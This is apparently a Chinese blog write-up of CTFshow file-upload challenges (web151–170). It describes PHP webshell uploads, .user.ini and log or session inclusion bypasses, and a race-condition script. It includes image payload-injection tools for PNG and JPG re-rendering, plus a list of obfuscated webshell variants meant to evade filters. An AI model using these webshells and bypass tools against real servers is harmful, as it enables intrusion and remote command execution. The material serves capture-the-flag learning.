• CTFshow Web入门 文件上传


    目录

    web151

    web152

    web153

    web154

    web155

    web156

    web157

    web158、web159

    web160

    web161

    web162

    web163

    web164

    web165

    web166

    web167

    web168

    web169

    web170


    web151

    1.

    写马改后缀为png上传,抓包修改文件信息

    回显路径,蚁剑连接

    2.

    先构造一句话木马php文件

    修改前端,然后上传php文件

     进入路径

    POST传参, 命令执行

    web152

    1.web151的方法可以白嫖

    2.前端不能修改,抓包修改后缀 

    上传成功后就和web151 2一样了

    web153

    .user.ini,上传一个图片马,然后上传.user.ini,使得当前目录下的所有php文件都去包含这个含有木马的图片。因为.user.ini只对它同一目录下的文件起作用,并且/upload/下存在index.php文件,所以上传之后直接去访问index.php才有效果,当访问index.php的时候,首先回去包含这张带有木马的图片,上传图片马,抓包改后缀

    上传.user.ini

    蚁剑直接连接/upload/index.php,密码是cmd

    web154

    上传一个文件马的时候回显文件内容不合规,对文件内容进行了限制

    经过测试发现是对php进行了限制,使用短标签,上传完图片马,还是要上传.user.ini

    依旧是连接/upload/index.php,发现了flag

    web155

    过滤了php关键字,使用短标签 

    访问路径

    命令执行

    web156

    过滤了[],使用{}代替,上传一句话木马和.user.ini

     

    上传成功进入路径 

    POST传参,命令执行

     

    web157

    经过测试发现过滤了;、[]、{},直接传命令执行,还是先传.user.ini再传index.png

    上传成功得到路径,访问路径

    web158、web159

    web157的方法可以通杀

    web160

    日志包含,过滤了关键词log,上传png文件和.user.ini 

    上传成功进入upload,在UA中直接命令执行 ,我执行了两次才回显出flag

    web161

    检测了文件头,增加文件头GIF89a绕过,上传index.png和.user.ini

    上传成功进入upload,然后修改UA,命令执行

    web162

    session文件包含、条件竞争 

    1. import requests
    2. import threading
    3. session = requests.session()
    4. sess = 'yu22x'
    5. url1 = "http://c00d1119-5295-4db1-b613-9b9f3047a91e.challenge.ctf.show/"
    6. url2 = "http://c00d1119-5295-4db1-b613-9b9f3047a91e.challenge.ctf.show/upload"
    7. data1 = {
    8. 'PHP_SESSION_UPLOAD_PROGRESS': ''
    9. }
    10. file = {
    11. 'file': 'yu22x'
    12. }
    13. cookies = {
    14. 'PHPSESSID': sess
    15. }
    16. def write():
    17. while True:
    18. r = session.post(url1, data=data1, files=file, cookies=cookies)
    19. def read():
    20. while True:
    21. r = session.get(url2)
    22. if 'flag' in r.text:
    23. print(r.text)
    24. threads = [threading.Thread(target=write),
    25. threading.Thread(target=read)]
    26. for t in threads:
    27. t.start()

    web163

    include url文件包含,直接在.user.ini配置文件中远程包含

    然后去访问/upload/,进行然后就可以1=system("tac ../flag.php");,由于我没有VPS所以做不出来

    web164

    1. $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    2. 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    3. 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    4. 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    5. 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    6. 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    7. 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    8. 0x66, 0x44, 0x50, 0x33);
    9. $img = imagecreatetruecolor(32, 32);
    10. for ($y = 0; $y < sizeof($p); $y += 3) {
    11. $r = $p[$y];
    12. $g = $p[$y+1];
    13. $b = $p[$y+2];
    14. $color = imagecolorallocate($img, $r, $g, $b);
    15. imagesetpixel($img, round($y / 3), 0, $color);
    16. }
    17. imagepng($img,'xxx'); //要修改的图片的路径
    18. /* 木马内容
    19. */
    20. ?>

    放包,然后传参

    传参完了之后,ctrl+s保存为txt类型的,里面就有flag

    web165

    发现需要jpg二次渲染,图片要用特定的图片,下面这一张就是二次渲染专用图片

    我们首先要上传到服务端,因为服务端会进行一次渲染,改动最小,然后保存为所有格式名称后缀为.jpg的图片,利用脚本生成二次渲染的图片

    1. /*
    2. The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().
    3. It is necessary that the size and quality of the initial image are the same as those of the processed image.
    4. 1) Upload an arbitrary image via secured files upload script
    5. 2) Save the processed image and launch:
    6. jpg_payload.php
    7. In case of successful injection you will get a specially crafted image, which should be uploaded again.
    8. Since the most straightforward injection method is used, the following problems can occur:
    9. 1) After the second processing the injected data may become partially corrupted.
    10. 2) The jpg_payload.php script outputs "Something's wrong".
    11. If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.
    12. Sergey Bobrov @Black2Fan.
    13. See also:
    14. https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
    15. */
    16. $miniPayload = "";
    17. if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
    18. die('php-gd is not installed');
    19. }
    20. if(!isset($argv[1])) {
    21. die('php jpg_payload.php ');
    22. }
    23. set_error_handler("custom_error_handler");
    24. for($pad = 0; $pad < 1024; $pad++) {
    25. $nullbytePayloadSize = $pad;
    26. $dis = new DataInputStream($argv[1]);
    27. $outStream = file_get_contents($argv[1]);
    28. $extraBytes = 0;
    29. $correctImage = TRUE;
    30. if($dis->readShort() != 0xFFD8) {
    31. die('Incorrect SOI marker');
    32. }
    33. while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
    34. $marker = $dis->readByte();
    35. $size = $dis->readShort() - 2;
    36. $dis->skip($size);
    37. if($marker === 0xDA) {
    38. $startPos = $dis->seek();
    39. $outStreamTmp =
    40. substr($outStream, 0, $startPos) .
    41. $miniPayload .
    42. str_repeat("\0",$nullbytePayloadSize) .
    43. substr($outStream, $startPos);
    44. checkImage('_'.$argv[1], $outStreamTmp, TRUE);
    45. if($extraBytes !== 0) {
    46. while((!$dis->eof())) {
    47. if($dis->readByte() === 0xFF) {
    48. if($dis->readByte() !== 0x00) {
    49. break;
    50. }
    51. }
    52. }
    53. $stopPos = $dis->seek() - 2;
    54. $imageStreamSize = $stopPos - $startPos;
    55. $outStream =
    56. substr($outStream, 0, $startPos) .
    57. $miniPayload .
    58. substr(
    59. str_repeat("\0",$nullbytePayloadSize).
    60. substr($outStream, $startPos, $imageStreamSize),
    61. 0,
    62. $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
    63. substr($outStream, $stopPos);
    64. } elseif($correctImage) {
    65. $outStream = $outStreamTmp;
    66. } else {
    67. break;
    68. }
    69. if(checkImage('payload_'.$argv[1], $outStream)) {
    70. die('Success!');
    71. } else {
    72. break;
    73. }
    74. }
    75. }
    76. }
    77. unlink('payload_'.$argv[1]);
    78. die('Something\'s wrong');
    79. function checkImage($filename, $data, $unlink = FALSE) {
    80. global $correctImage;
    81. file_put_contents($filename, $data);
    82. $correctImage = TRUE;
    83. imagecreatefromjpeg($filename);
    84. if($unlink)
    85. unlink($filename);
    86. return $correctImage;
    87. }
    88. function custom_error_handler($errno, $errstr, $errfile, $errline) {
    89. global $extraBytes, $correctImage;
    90. $correctImage = FALSE;
    91. if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
    92. if(isset($m[1])) {
    93. $extraBytes = (int)$m[1];
    94. }
    95. }
    96. }
    97. class DataInputStream {
    98. private $binData;
    99. private $order;
    100. private $size;
    101. public function __construct($filename, $order = false, $fromString = false) {
    102. $this->binData = '';
    103. $this->order = $order;
    104. if(!$fromString) {
    105. if(!file_exists($filename) || !is_file($filename))
    106. die('File not exists ['.$filename.']');
    107. $this->binData = file_get_contents($filename);
    108. } else {
    109. $this->binData = $filename;
    110. }
    111. $this->size = strlen($this->binData);
    112. }
    113. public function seek() {
    114. return ($this->size - strlen($this->binData));
    115. }
    116. public function skip($skip) {
    117. $this->binData = substr($this->binData, $skip);
    118. }
    119. public function readByte() {
    120. if($this->eof()) {
    121. die('End Of File');
    122. }
    123. $byte = substr($this->binData, 0, 1);
    124. $this->binData = substr($this->binData, 1);
    125. return ord($byte);
    126. }
    127. public function readShort() {
    128. if(strlen($this->binData) < 2) {
    129. die('End Of File');
    130. }
    131. $short = substr($this->binData, 0, 2);
    132. $this->binData = substr($this->binData, 2);
    133. if($this->order) {
    134. $short = (ord($short[1]) << 8) + ord($short[0]);
    135. } else {
    136. $short = (ord($short[0]) << 8) + ord($short[1]);
    137. }
    138. return $short;
    139. }
    140. public function eof() {
    141. return !$this->binData||(strlen($this->binData) === 0);
    142. }
    143. }
    144. ?>

    抓包将GET方法变成POST方法,然后写入马,然后命令执行1=system("tac flag.php");

    web166

    web167

    访问上传了的1.png文件,然后利用POST的1来进行命令执行

    发现了flag.php,tac抓一下flag.php

    web168

    免杀,下面是常用的免杀脚本,抓包上传

    1. 脚本1:
    2. `$_REQUEST[1]`;?> //利用反引号执行系统命令
    3. 脚本2:
    4. $a=$_REQUEST['a'];
    5. $b=$_REQUEST['b'];
    6. $a($b);
    7. ?>
    8. //a=system&b=tac ../flagaa.php
    9. 脚本3:
    10. $a='syste'.'m';($a)('ls ../'); //拼接
    11. //把ls ../换成tac ../flagaa.php即可找到flag
    12. 脚本4:
    13. $a = "s#y#s#t#e#m";
    14. $b = explode("#",$a);
    15. $c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
    16. $c($_REQUEST[1]);
    17. ?>
    18. //c相当于system,给1赋值参数即可
    19. 脚本5:
    20. $a=substr('1s',1).'ystem'; $a($_REQUEST[1]); ?>
    21. 脚本6:
    22. $a=strrev('metsys'); $a($_REQUEST[1]); ?>
    23. 脚本7:
    24. $pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi{abs})($$pi{acos});
    25. #数字函数 get传参 abs=system&acos=tac ../flagaa.php

    上传成功访问upload/1.php

    参数执行,列一下目录

    在flagaa.php中发现了flag

    web169

    发现只能上传zip文件 

    但是直接上传zip文件,回显文件类型不合规

    经测试发现,Content-Type:image/png可以上传成功

    但是同时也过滤了<、>、?、$等

    使用.user.ini进行日志包含,在UA写入一句话木马

    上传成功,访问upload/1.php

    命令执行就可以了

     

    web170

    和web169类似,这次使用蚁剑来做,查看源码发现还是只能上传zip

    经过测试发现禁用了<、>、?、$、php、eval等,还是利用.user.ini进行日志包含

    使用蚁剑连接,http:xxxxx/upload/1.php,密码shell

    在flagaa.php中发现了flag

  • 相关阅读:
    623. 在二叉树中增加一行
    【软件设计师21天-考点整理】6)计算机系统构成及硬件基础知识
    汽车UDS诊断之读取DTC(19h 02h)子功能深度剖析
    Django(6):详解Django路由设计
    如何用Python和NLTK有效地总结文本
    5.RabbitMQ高级特性
    【开发篇】七、RedisTemplate与StringRedisTemplate + Jedis与Lettcus
    向AI提问,我是怎么做的?
    javase----java基础面试题01-05
    Gradio 最快创建Web 界面部署到服务器并演示机器学习模型,本文提供教学案例以及部署方法,避免使用繁琐的django
  • 原文地址:https://blog.csdn.net/m0_62905261/article/details/127479999